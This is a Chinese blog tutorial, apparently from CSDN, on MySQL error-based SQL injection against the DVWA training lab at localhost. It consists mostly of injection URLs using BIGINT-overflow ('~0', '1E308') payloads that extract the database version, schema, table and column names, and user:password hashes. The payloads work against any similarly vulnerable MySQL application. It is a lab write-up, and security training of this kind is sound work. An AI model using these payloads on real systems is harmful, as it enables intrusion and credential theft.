mysql高级报错注入_mysql新型报错注入实例

使用DVWA的第一关作为例子讲解一下mysql的新型注入。

第一关链接:http://localhost:8080/dvwa/vulnerabilities/sqli/?id=1&Submit=%C8%B7%B6%A8# ,参数id存在注入

20140630214111.jpg

http://localhost:8080/dvwa/vulnerabilities/sqli/?id=1’&Submit=%C8%B7%B6%A8#

20140630214145.jpg

可以看到将id参数设为1’时报错了,该处存在mysql的字符型报错注入。下面讲解一下具体如何使用mysql新型报错注入来获取信息。

1、判断是否存在新型报错注入

http://localhost:8080/dvwa/vulnerabilities/sqli/?id=1' and 18446744073709551610*2 and '1'='1&Submit=%C8%B7%B6%A8#

20140630214616.jpg

可以看到注入点数据库存在新型报错注入。

2、获取version等信息,如version(),user(),database()等

http://localhost:8080/dvwa/vulnerabilities/sqli/?id=1' and (select!x-~0.FROM(select+version()x)f) and '1'='1&Submit=%C8%B7%B6%A8#

20140630221841.jpg

3、暴库

http://localhost:8080/dvwa/vulnerabilities/sqli/?id=1' and (select!x-~0.FROM(select group_concat(SCHEMA_NAME)x from information_schema.SCHEMATA)f)and '1'='1&Submit=%C8%B7%B6%A8#

20140630222336.jpg

4、爆表

http://localhost:8080/dvwa/vulnerabilities/sqli/?id=1' and (select!x-~0.FROM(select group_concat(TABLE_NAME)x from information_schema.TABLES where TABLE_SCHEMA='dvwa')f)and '1'='1&Submit=%C8%B7%B6%A8#

20140630223039.jpg

5、爆列

http://localhost:8080/dvwa/vulnerabilities/sqli/?id=1' and (select!x-~0.FROM(select group_concat(COLUMN_NAME)x from information_schema.COLUMNS where TABLE_NAME='users')f)and '1'='1&Submit=%C8%B7%B6%A8#

20140630223305.jpg

6、爆数据

http://localhost:8080/dvwa/vulnerabilities/sqli/?id=1' and (select!x-~0.FROM(select group_concat(user,':',password)x from dvwa.users)f)and '1'='1&Submit=%C8%B7%B6%A8#

20140630223535.jpg

———————————————————————————————————————

下面是测试时的其他语句,不过没有上面那么简洁,使用时使用上面的语句即可。

获取version信息

http://localhost:8080/dvwa/vulnerabilities/sqli/?id=1' and 1E308*if((select*from(select version())x),2,2) and '1'='1&Submit=%C8%B7%B6%A8#

20140630214923.jpg

暴库

http://localhost:8080/dvwa/vulnerabilities/sqli/?id=1' and 1E308*if((select SCHEMA_NAME from(select *from information_schema.SCHEMATA LIMIT 0,1)a limit 1),2,2) and '1'='1&Submit=%C8%B7%B6%A8#

20140630220538.jpg

20140630220603.jpg

20140630220629.jpg

只要不断改变上面的limit后面的参数,就可以把所有的库爆出来。

爆表

http://localhost:8080/dvwa/vulnerabilities/sqli/?id=1' and 1E308*if((select TABLE_NAME from(select * from information_schema.TABLES where TABLE_SCHEMA='dvwa' limit 1,1)a limit 1),2,2) and '1'='1&Submit=%C8%B7%B6%A8#

20140630221252.jpg

和上面爆库一样,只要不断改变limit后面的数值就可以爆出所有的表。

参考资料:

1、http://www.jinglingshu.org/?p=7343

2、http://www.myhack58.com/Article/html/3/7/2011/30958.htm

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值